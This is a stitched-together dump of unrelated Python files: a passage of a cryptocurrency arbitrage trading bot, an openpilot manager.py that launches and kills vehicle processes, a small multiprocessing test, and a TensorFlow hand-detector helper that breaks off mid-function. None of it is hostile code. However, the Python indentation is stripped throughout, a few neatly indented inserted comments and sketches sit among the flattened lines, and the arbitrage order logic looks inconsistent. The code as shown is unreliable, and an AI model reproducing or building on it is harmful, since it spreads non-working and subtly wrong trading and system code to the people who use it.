# check presence of arbitrage opportunity without fees
max_ask = max([order_book["asks"][0][0] for order_book in order_books_raw])
min_bid = min([order_book["bids"][0][0] for order_book in order_books_raw])
if max_ask > min_bid:
# opportunity for arbitrage exists
# calculation of maximal arbitrage opportunity for each exchange
opportunities = {}
for order_book in order_books_raw:
# extraction of fees
exchange = order_book['exchange']
asks_to_arbitrage = [order_item for order_item in order_book["asks"] if order_item[0] > min_bid]
bids_to_arbitrage = [order_item for order_item in order_book["bids"] if order_item[0] < max_ask]
volume_asks = sum([item[1] for item in asks_to_arbitrage])
price_asks = sum([item[1] * item[0] for item in asks_to_arbitrage])
volume_bids = sum([item[1] for item in bids_to_arbitrage])
price_bids = sum([item[1] * item[0] for item in bids_to_arbitrage])
opportunities[order_book['exchange']] = {'asks': [price_asks, volume_asks], 'bids': [price_bids, volume_bids]}
if self.visualization:
self.logger_wrapper.logger.info(f"Opportunities: {opportunities}")
src.helpers.visualize_order_book("Raw orderbooks", order_books_raw)
# construction of fully arbitraged order book
unarbitraged_order_book = self.deselect_orders_in_interval(order_books_raw, min_bid, max_ask)
src.helpers.visualize_order_book("Order books after full arbitrage", unarbitraged_order_book)
# additional checking/checking threshold
orders_to_execute = self.prepare_orders(opportunities, currency_pair, basic_points_for_currency, precision)
# check funds for trades
orders_to_be_executed = self.check_funds_for_trades(orders_to_execute)
# execute trades
executed_trades = self.execute_orders(orders_to_be_executed)
# check fulfillment of trades
#self.check_fulfillment_of_orders(executed_trades)
def log_executed_order(self, order_response, exchange):
query_to_execute = src.sql_queries.insert_into_order_log(
self.algo_id, exchange, order_response, self.logger_wrapper.logger
)
self.db_connector.execute_dml(query_to_execute)
@staticmethod
def deselect_orders_in_interval(order_books_raw, min_bid, max_ask):
# construction of fully arbitraged order book
unarbitraged_order_book = []
for order_book in order_books_raw:
asks_unable_to_arbitrage = [order_item for order_item in order_book["asks"] if order_item[0] <= min_bid]
bids_unable_to_arbitrage = [order_item for order_item in order_book["bids"] if order_item[0] >= max_ask]
exchange_order_book = {'exchange': order_book['exchange'], "asks": asks_unable_to_arbitrage, "bids": bids_unable_to_arbitrage}
unarbitraged_order_book.append(exchange_order_book)
return unarbitraged_order_book
def prepare_orders(self, opportunities, currency_pair, basic_points_for_currency, precision):
orders_to_execute = {}
for exchange, opportunity in opportunities.items():
fee_bid = self.fee_map[exchange]['BUY'] / basic_points_for_currency
fee_ask = self.fee_map[exchange]['SELL'] / basic_points_for_currency
orders_to_execute[exchange] = []
# TODO: taking into account latency
# calculate fees for transaction
order = {
"currency_pair": currency_pair,
"status": "in preparation",
"algo_id": self.algo_id,
"exchange_id": self.configuration['EXCHANGES'][exchange]["ID"]
}
if opportunity['asks'][1] > 0 and opportunity['bids'][1] > 0:
# exchange in the middle
average_direction_of_trade = np.mean([opportunity['asks'][1], -opportunity['bids'][1]])
# it can be improved
order.update({
"volume": util.round_down(abs(opportunity['asks'][1] if average_direction_of_trade > 0 else opportunity['bids'][1]), precision),
"price": (opportunity['asks'][0] if average_direction_of_trade > 0 else opportunity['bids'][0]),
"type": ('BUY' if average_direction_of_trade > 0 else 'SELL')
})
elif opportunity['asks'][1] > 0 and opportunity['bids'][1] == 0:
order.update({
"volume": util.round_down(abs(opportunity['asks'][1]), precision),
"price": opportunity['asks'][0],
"type": 'SELL',
"fees": opportunity['asks'][0] * fee_bid,
"currency_fee": currency_pair["code_quote"]
})
elif opportunity['bids'][1] > 0 and opportunity['asks'][1] == 0:
order.update({
"volume": util.round_down(abs(opportunity['bids'][1]), precision),
"price": opportunity['asks'][0],
"type": 'BUY',
"fees": opportunity['bids'][0] * fee_ask,
"currency_fee": currency_pair["code_base"]
})
elif opportunity['bids'][1] == 0 and opportunity['asks'][1] == 0:
# no opportunity detected
continue
else:
raise IncorrectStateException("Fundamental algorithm error!")
orders_to_execute[exchange].append(order)
self.logger_wrapper.logger.debug(f"New order prepared: {order}")
return orders_to_execute
def execute_orders(self, orders_to_be_executed):
executed_trades = []
for exchange, orders in orders_to_be_executed.items():
for order in orders:
currency_pair = order["currency_pair"]
response = self.client.place_order(
order_type=sdk.Client.MARKET_ORDER,
base=currency_pair["code_base"],
quote=currency_pair["code_quote"],
direction=(
sdk.Client.BUY if order["type"] == "BUY" else sdk.Client.SELL
),
quantity=order["volume"],
exchanges=exchange
)
order["status"] = "submitted"
self.current_order_id = response["order"]["order_id"]
executed_trades.append((response, order))
self.logger_wrapper.logger.debug(f"Order executed: {order}")
self.orders_observer.enqueue_order_thread(
{
timeout_tag: datetime.datetime.now() + datetime.timedelta(minutes=1),
order_sdk_tag: response,
additional_info_tag:{
"algo_id": order["algo_id"],
"exchange_id": order["exchange_id"]
}
})
return executed_trades
def check_fulfillment_of_orders(self, executed_trades):
for item in executed_trades:
response, order = item
status = self.client.order_status(response['order']['order_id'])
if status['trade_status'][0]['execution_status'] == 1:
order['status'] = 'finished'
# log data into DB
self.log_executed_order(status, response['exchanges'])
else:
# status of the order not finished
order['status'] = 'unfinished'
def check_funds_for_trades(self, orders_to_execute):
# check funds for trades
orders_to_be_executed = {}
for exchange, orders in orders_to_execute.items():
orders_to_be_executed[exchange] = []
for order in orders:
currency = order["currency_pair"]["code_quote"] if order["type"] == "BUY" else order["currency_pair"]["code_base"]
funds_in_appropriate_currency = self.funds[exchange][currency]
approximate_price = order["price"]
if funds_in_appropriate_currency * (1 - self.fund_buffer) < approximate_price:
# limiting volume
order["volume"] = (1 - self.fund_buffer) * order["volume"]
orders_to_be_executed[exchange].append(order)
return orders_to_be_executed
#########################################################
# Signal calculation and determination [A]
#########################################################
### Step A 1 ###
def get_modified_snapshots(self) -> Dict[str, Dict[str, Dict[str, float]]]:
"""
get the different order books and merge them
inputs:
None
return format
{
exchange_1: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
exchange_2: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
exchange_n: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
}
"""
vwap_order_books = {}
return vwap_order_books
### Step A 2 ###
def find_opportunities(self, order_books: Dict[str, Dict[str, Dict[str, float]]]) -> List[Signal]:
"""
inputs:
Takes the order_books format from get_modified_snapshots()
returns:
A list of Signal objects, one for each ordered pair of exchanges with data available.
"""
signals: List[Signal] = []
for sell_ex in self.exchanges:
for buy_ex in self.exchanges:
if sell_ex == buy_ex:
continue
signal = self.extract_arbitrage_ops(order_books, sell_ex, buy_ex)
if signal is None:
continue
signals.append(signal)
return signals
### Step A 2.1 ###
def extract_arbitrage_ops(self, order_books: Dict[str, Dict[str, Dict[str, float]]], sell_ex, buy_ex) -> Union[
Signal, None]:
"""
inputs:
order_books is a subset of all order books which are being observed.
The subset focuses on two exchanges
returns:
A Signal with spread, volume and prices, or None if data for either exchange is missing.
"""
basic_points = 10000
signal = Signal()
signal.sell_exchange = sell_ex
signal.buy_exchange = buy_ex
if sell_ex not in order_books.keys():
logger.info(f"data for sell exchange [{sell_ex}] missing")
return
if buy_ex not in order_books.keys():
logger.info(f"data for buy exchange [{buy_ex}] missing")
return
book_bid = order_books[sell_ex]
book_ask = order_books[buy_ex]
fee_bid = self.fee_map[sell_ex] / basic_points
fee_ask = self.fee_map[buy_ex] / basic_points
bid_price = book_bid["bid"]["price"]
ask_price = book_ask["ask"]["price"]
spread = (((bid_price * (1 - fee_bid)) / (ask_price * (1 + fee_ask))) - 1) * basic_points
volume = min(book_bid["bid"]["volume"], book_ask["ask"]["volume"], self.lot_size)
volume = util.round_down(volume, self.precision)
signal.spread = spread
signal.volume = volume
signal.sell_price = bid_price
signal.buy_price = ask_price
return signal
### Step A 3.1 ###
def check_thresholds(self, signals: List[Signal]) -> List[Signal]:
"""Check thresholds"""
#
signals = [self._check_threshold(signal) for signal in signals]
# select only signals which meet the threshold
signals = [signal for signal in signals if signal.above_thresh]
return signals
### Step A 3.1.1 ###
def _check_threshold(self, signal: Signal):
"""check whether the spread is above the specified threshold for the combination"""
threshold = self.threshold_map[signal.sell_exchange][signal.buy_exchange]
if signal.spread >= threshold:
signal.above_thresh = True
else:
signal.above_thresh = False
return signal
### Step A 3.2 ###
def check_fund_availability(self, signals: List[Signal]) -> List[Signal]:
executable_signals: List[Signal] = []
for signal in signals:
buy_exchange_funds = self.funds[signal.buy_exchange][self.quote] # We use quote currency to buy
sell_exchange_funds = self.funds[signal.sell_exchange][self.base] # we use base currency for a sell
volume_base = signal.volume
volume_quote = signal.volume * signal.sell_price
if buy_exchange_funds - (volume_quote * self.fund_buffer) < 0:
continue
if sell_exchange_funds - (volume_base * self.fund_buffer) < 0:
continue
executable_signals.append(signal)
return executable_signals
### Step A 4 ###
def select_signals(self, signals: List[Signal]) -> List[Signal]:
"""chooses the trade which is the highest above it's threshold in relative terms:
(spread / threshold * volume)"""
current_lead: Tuple[float, Signal] = (0, signals[0])
for signal in signals:
threshold = self.threshold_map[signal.sell_exchange][signal.buy_exchange]
val = signal.spread / threshold * signal.volume
if val > current_lead[0]:
current_lead = (val, signal)
# kept as a list even though only a single signal is selected
return [current_lead[1]]
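# Worked example (illustrative numbers, not from the original): with a spread of
# 12 bps, a threshold of 8 bps and a volume of 0.5, the relative score is
# 12 / 8 * 0.5 = 0.75; the signal with the largest such score is kept.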
#########################################################
# Signal and trade execution [B]
#########################################################
### Step B 1 ###
def execute_arbitrage_signals(self, signals: List[Signal]):
threads = []
for signal in signals:
t = threading.Thread(target=self.execute_trade, kwargs={"signal": signal}, daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
### Step B 1.1 ###
def execute_trade(self, signal):
pool = ThreadPool(processes=2)
buy_exchange = signal.buy_exchange
sell_exchange = signal.sell_exchange
volume = signal.volume
start_time = util.unix_milli()
buy_thread = pool.apply_async(self.place_order, (), {
"order_type": sdk.Client.MARKET_ORDER,
'base': self.base,
'quote': self.quote,
'direction': sdk.Client.BUY,
'quantity': volume,
'exchanges': buy_exchange,
})
sell_thread = pool.apply_async(self.place_order, (), {
"order_type": sdk.Client.MARKET_ORDER,
'base': self.base,
'quote': self.quote,
'direction': sdk.Client.SELL,
'quantity': volume,
'exchanges': sell_exchange
})
buy_order = buy_thread.get()
sell_order = sell_thread.get()
end_time = util.unix_milli()
logger.info(f'Duration order placement: {round(end_time - start_time, 6)}ms')
logger.info(f'Buy: {buy_order}')
logger.info(f'Sell: {sell_order}')
t = threading.Thread(target=self.log_executions,
kwargs={"buy_order": buy_order, "sell_order": sell_order, "buy_exchange": buy_exchange,
"sell_exchange": sell_exchange})
t.start()
@ORDER_RESPONSE_TIMES.time()
def place_order(self, **kwargs):
"""
function created as a wrapper to time the order executions
:param kwargs:
:return:
"""
logger.debug(kwargs)
return self.client.place_order(**kwargs)
def log_executions(self, buy_order, sell_order, buy_exchange, sell_exchange):
"""This function logs the two legs of an arbitrage trade collection"""
logger.debug("logging order")
combo_id = uuid.uuid4()
timestamp = util.unix_milli()
# Buy leg
extract_and_log("buy", combo_id, timestamp, buy_exchange, buy_order, self.name())
extract_and_log("sell", combo_id, timestamp, sell_exchange, sell_order, self.name())
#########################################################
# Settings
#########################################################
def load_configs_yaml(self) -> Dict[str, Union[float, str, Dict]]:
configs: Dict
with open(self.configs_file, 'r') as stream:
try:
configs = yaml.safe_load(stream)
except yaml.YAMLError as exc:
logger.error(exc)
return configs
def set_threshold_map(self, thresh):
threshold_map = {}
for exchange in self.exchanges:
if exchange not in threshold_map.keys():
threshold_map[exchange] = {}
for second_exchange in self.exchanges:
if exchange == second_exchange:
continue
threshold_map[exchange][second_exchange] = thresh
self.threshold_map = threshold_map
def set_fee_map(self, fees: Dict[str, float]):
for exchange, fee in fees.items():
self.fee_map[exchange] = fee
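# Minimal sketch (not part of the original class): the spread computed in
# extract_arbitrage_ops() expressed as a standalone function, with illustrative
# prices and fees. Fees are given in basis points (1/10000), matching the
# `basic_points` divisor used above.
def _example_spread_bps(bid_price, ask_price, fee_bid_bps, fee_ask_bps):
    """Return the arbitrage spread in basis points after fees."""
    basic_points = 10000
    fee_bid = fee_bid_bps / basic_points
    fee_ask = fee_ask_bps / basic_points
    return (((bid_price * (1 - fee_bid)) / (ask_price * (1 + fee_ask))) - 1) * basic_points
# Example values: selling at 30050 with a 10 bps fee against buying at 30000 with
# a 10 bps fee gives (30050 * 0.999) / (30000 * 1.001) - 1, roughly -3.3 bps,
# so that combination would not pass a positive threshold.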
if __name__ == '__main__':
logger_wrapper = src.buildblocks.init_logger(mode=src.helpers.DBMode.DEV)
test_algo_name = "A-tests-multi-lateral"
client_sdk = src.buildblocks.init_sdk_client(logger_wrapper, sdk_client=src.helpers.SDKClient.REAL)
instance = ArbitrageInstance(
algo_name=test_algo_name,
logger_wrapper=logger_wrapper,
client=client_sdk
)
while True:
instance.trade_algorithm()
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad, pm_grant, system
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
#"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
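# Hedged usage sketch (not part of the original manager.py): registering an extra
# Python process so the manager starts it alongside the persistent processes.
# "my_monitor" and its module path are hypothetical placeholders.
def _example_register_extra_process():
    register_managed_process("my_monitor", "selfdrive.monitoring.my_monitor", car_started=False)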
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
shutdownd = Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",))
shutdownd.start()
pm_grant("com.neokii.openpilot", "android.permission.ACCESS_FINE_LOCATION")
system("am startservice com.neokii.oproadlimit/.MainService")
system("am startservice com.neokii.openpilot/.MainService")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
# subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON and "QT" not in os.environ:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
if msg.deviceState.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
# HKG
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("AutoLaneChangeEnabled", "0"),
# scc smoother
("SccSmootherState", "0"),
("SccSmootherEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("SccSmootherSwitchGapOnly", "0"),
("ShowDebugUI", "0")
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test.py
|
import multiprocessing as mp
import os
import mod
print(os.getpid())
ps = [mp.Process(target=mod.f) for _ in range(3)]
for p in ps:
p.start()
for p in ps:
p.join()
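# `mod` is not shown in this dump; a minimal, assumed implementation that would
# make this test runnable could look like the sketch below (saved as mod.py next
# to test.py). The body is purely illustrative.
#
# import os
#
# def f():
#     # each child prints its own pid, demonstrating separate processes
#     print("child", os.getpid())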
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
import json
detection_graph = tf.Graph()
sys.path.append("..")
# Load a frozen inference graph into memory
def load_inference_graph(NUM_CLASSES, PATH_TO_CKPT, PATH_TO_LABELS):
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# load frozen tensorflow model into memory
print("> ====== loading frozen graph into memory", PATH_TO_CKPT)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.", PATH_TO_CKPT, PATH_TO_LABELS)
return detection_graph, sess, category_index
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def get_tags(classes, category_index, num_hands_detect, score_thresh, scores, boxes, image_np):
im_height, im_width, channels = image_np.shape
tags = []
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
if classes[i] in category_index.keys():
class_name = category_index[classes[i]]['name']
else:
class_name = 'N/A'
tag = {}
tag['class'] = class_name
tag['score'] = scores[i].tolist()
